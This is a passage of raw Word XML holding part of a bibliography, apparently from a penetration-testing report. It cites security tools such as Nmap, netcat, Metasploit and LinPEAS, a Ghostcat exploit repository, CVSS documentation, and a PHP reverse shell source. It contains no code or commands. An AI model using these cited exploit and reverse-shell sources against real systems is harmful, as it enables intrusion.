          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[24] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Discover your network</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Nmap.org [access 3 October, 2025]. Available: https://nmap.org/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="222" w:name="resource25"/>
    <w:p w14:paraId="39EC63FF" w14:textId="0E614640" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="00FC6DB3">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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[25] netcat [Online]. Kali.org [access 3 October, 2025]. Available: http:\\kali.org\\tools\\netcat\\"</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[25] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Kali.org [access 3 October, 2025]. Available: http://kali.org/tools/netcat/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w14:paraId="08253646" w14:textId="1DDFD2B5" w:rsidR="006811F2" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="006811F2">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end"/>
      </w:r>
      <w:bookmarkStart w:id="223" w:name="resource26"/>
      <w:r w:rsidR="00A72FFA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[26] Burp Suite documentation [Online].Portswigger.net [access 16 December, 2025]. Available: https:\\portswigger.net\\burp\\documentation\\contents"</w:instrText>
      </w:r>
      <w:r w:rsidR="00A72FFA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00A72FFA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A72FFA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[26] </w:t>
      </w:r>
      <w:r w:rsidR="00A72FFA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Burp Suite documentation</w:t>
      </w:r>
      <w:r w:rsidR="00A72FFA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].Portswigger.net [access 16 December, 2025]. Available: https://portswigger.net/burp/documentation/contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
      <w:r w:rsidR="00A72FFA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="224" w:name="resource27"/>
    <w:p w14:paraId="7755A211" w14:textId="1610176B" w:rsidR="00A72FFA" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="006811F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="108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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[27] ZAP Documentation [Online].Zaproxy.org [access 16 December, 2025]. Available: https:\\www.zaproxy.org\\docs\\"</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[27]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ZAP Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].Zaproxy.org [access 16 December, 2025]. Available: https://www.zaproxy.org/docs/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p w14:paraId="31AFD42D" w14:textId="374ABBEF" w:rsidR="00D401CC" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="00D401CC">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end"/>
      </w:r>
      <w:bookmarkStart w:id="225" w:name="resource28"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[28] LinPEAS - Linux Privilege Escalation Awesome Script [Online].Github.com [access 16 December, 2025]. Available: https:\\github.com\\peass-ng\\PEASS-ng\\tree\\master\\linPEAS"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[28] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS - Linux Privilege Escalation Awesome Script </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Online].Github.com [access 16 December, 2025]. Available: https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="226" w:name="resource29"/>
    <w:bookmarkEnd w:id="225"/>
    <w:p w14:paraId="6905E1D6" w14:textId="7EB2C54E" w:rsidR="00611E94" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="00611E94">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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[29] ffuf - Fuzz Faster U Fool [Online]. Github.com [access 16 December, 2025]. Available: https:\\github.com\\ffuf\\ffuf"</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[29] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ffuf - Fuzz Faster U Fool</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Github.com [access 16 December, 2025]. Available:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://github.com/ffuf/ffuf</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="227" w:name="resource30"/>
    <w:p w14:paraId="61D1654A" w14:textId="66F024F8" w:rsidR="00611E94" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="00D401CC">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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[30] Metasploit-framework [Online]. Github.com [access 16 December, 2025]. Available: https:\\github.com\\rapid7\\metasploit-framework"</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[30]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit-framework </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Online]. Github.com [access 16 December, 2025]. Available: https://github.com/rapid7/metasploit-framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="228" w:name="resource31"/>
    <w:bookmarkEnd w:id="227"/>
    <w:p w14:paraId="291ED794" w14:textId="016DD442" w:rsidR="00A72FFA" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="00D401CC">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[31] Ghostcat-CNVD-2020-10487 [Online].Github.com [access 16 December, 2025]. Available: https:\\github.com\\00theway\\Ghostcat-CNVD-2020-10487"</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[31] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ghostcat-CNVD-2020-10487</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].Github.com [access 16 December, 2025]. Available: https://github.com/00theway/Ghostcat-CNVD-2020-10487</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="228"/>
    <w:p w14:paraId="771135B5" w14:textId="4806BDB1" w:rsidR="00A72FFA" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="00310CE8">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="229" w:name="Resource32"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[32] Common Vulnerability Scoring System version 4.0: Specification [Online] Document - December 16, 2025 available: https:\\www.first.org\\cvss\\specification-document"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[32] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Vulnerability Scoring System version 4.0: Specification </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Online]. First.org [access 16 December, 2025]. Available: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.first.org/cvss/specification-document </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="229"/>
    <w:p w14:paraId="1C47E8F9" w14:textId="363F56AC" w:rsidR="00A72FFA" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="00CC7746">
      <w:pPr>
        <w:ind w:left="1020"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="230" w:name="resource33"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[33] Common Vulnerability Scoring System Calculator [Online]. Nvd.nist.gov [access 16 December, 2025]. Available: https:\\nvd.nist.gov\\vuln-metrics\\cvss\\v3-calculator"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[33]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Common Vulnerability Scoring System Calculator</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Nvd.nist.gov [access 16 December, 2025]. Available: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="230"/>
    <w:p w14:paraId="461ADD59" w14:textId="18DE989C" w:rsidR="00A72FFA" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="002D1CA9">
      <w:pPr>
        <w:ind w:left="1020"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="231" w:name="resource34"/>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[34] Common Vulnerability Scoring System version 4.0: User Guide:[Online].First.org [access 16 December, 2025]. Available: https:\\www.first.org\\cvss\\user-guide"</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[34] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Vulnerability Scoring System version 4.0: User Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:[Online].First.org [access 16 December, 2025]. Available: https://www.first.org/cvss/user-guide</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="231"/>
    <w:p w14:paraId="36E7D936" w14:textId="396D5707" w:rsidR="00A72FFA" w:rsidRPr="00D77DFE" w:rsidRDefault="00A72FFA" w:rsidP="00BF6F61">
      <w:pPr>
        <w:ind w:left="1020"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="232" w:name="resource96"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[35] Reverse Shell PHP Source Code [Online].Github.com [access 16 December, 2025]. Available:  https:\\github.com\\pentestmonkey\\php-reverse-shell\\blob\\master\\php-reverse-shell.php"</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[35] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
